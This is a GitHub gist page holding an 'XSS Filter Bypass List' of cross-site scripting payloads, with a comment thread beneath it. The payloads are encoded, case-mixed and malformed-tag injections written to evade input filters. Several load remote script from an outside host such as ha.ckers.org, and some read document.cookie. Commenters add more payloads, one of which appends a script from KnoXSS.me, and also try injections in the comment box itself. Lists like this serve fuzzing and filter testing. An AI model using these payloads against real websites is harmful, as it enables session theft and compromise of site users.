Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
@ninja25538

This comment has been minimized.

Copy link

ninja25538 commented Aug 8, 2017

Nice!, Thanks!

@Noob-Walid

This comment has been minimized.

Copy link

Noob-Walid commented Oct 12, 2017

which worked most??

@Cache-Bounty

This comment has been minimized.

Copy link

Cache-Bounty commented Apr 6, 2018

test

@CesBear

This comment has been minimized.

Copy link

CesBear commented May 8, 2018

cool

@xeno6696

This comment has been minimized.

Copy link

xeno6696 commented May 10, 2018

@Noob-Walid: It's doubtful that any of these are going to "work" right out of the box. You'll want to use a fuzzer against a suspected form field, and see what tag types even partially "make it through." Though, all of these inputs are available at OWASP, and actually are also available from both fuzzdb and SecLists in text files that contain the name "rsnake."

As a matter of fact, all of you should just clone those repos.

@0xINT3

This comment has been minimized.

Copy link

0xINT3 commented Sep 1, 2018

many don't even work. websites are getting smart. :/

@sittminzaw

This comment has been minimized.

Copy link

sittminzaw commented Sep 5, 2018

"autofocus/onfocus=alert(`Bug´)-->
also work

@IvanGuGon1

This comment has been minimized.

Copy link

IvanGuGon1 commented Jan 1, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

rip github xss protection

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

here, sons. <img src = x onerror = alert( document.cookies ) >

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

start with > and without the spaces

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

fuck

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

<h1>no</h1>

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

no

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

KNOX

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

KNOX

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

S05PWA==

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

PDFLTk9YPDE=

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

'"KNOX

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

KNOX\

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

confirmK

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

(confirm)(1)

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

'-confirmK-'

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

"-confirmK-"

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

${(confirm)(1)}

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

1</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<sCR<script>iPt>alert(1)</SCr</script>IPt>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

iji

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"</SCRIPT>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<script>document.write("PT SRC="http://ha.ckers.org/xss.js"></script>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"></script>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"</script>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<img src=xonerror=alert( document.cookies)>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<img src = x onerror = alert( document.cookies ) >

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=`https://KnoXSS.me\x2F00?1=6243</script>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 16, 2019

Lol

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 16, 2019

test

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 16, 2019

<script>alert(fuck)</script>
@Yashin2134

This comment has been minimized.

Copy link

Yashin2134 commented Feb 22, 2019

@Yashin2134

This comment has been minimized.

Copy link

Yashin2134 commented Feb 22, 2019

Skip to content
Search…
All gists
Back to GitHub
New gist
@Yashin2134
187
68 @rvrsh3llrvrsh3ll/xxsfilterbypass.lst
Last active 2 days ago •

<script src="https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec.js"></script>

Code Revisions 4 Stars 187 Forks 68
XSS Filter Bypass List
xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@Yashin2134

This comment has been minimized.

Copy link

Yashin2134 commented Feb 22, 2019

<SCRIPT>alert("XSS")</SCRIPT>">

@wlanpsk

This comment has been minimized.

Copy link

wlanpsk commented Mar 28, 2019

Mmm

@EDMPL

This comment has been minimized.

Copy link

EDMPL commented Apr 1, 2019

test

@EDMPL

This comment has been minimized.

Copy link

EDMPL commented Apr 1, 2019

nice

@s04v

This comment has been minimized.

Copy link

s04v commented Apr 9, 2019

Test

@itayze

This comment has been minimized.

Copy link

itayze commented Apr 13, 2019

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

@ABCyborg25

This comment has been minimized.

Copy link

ABCyborg25 commented Apr 15, 2019

Hi All,

I am new to InfoSec and need a small help from you dignitaries

While performing XSS what if my web aplication Firewall is blocking certain words like Alert, Script etc.

TIA for your answers!

@m1lw0rm

This comment has been minimized.

Copy link

m1lw0rm commented Apr 16, 2019

@m1lw0rm

This comment has been minimized.

Copy link

m1lw0rm commented Apr 16, 2019

@T3ap0T

This comment has been minimized.

Copy link

T3ap0T commented Apr 18, 2019

rofl xss in the comments
plz

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.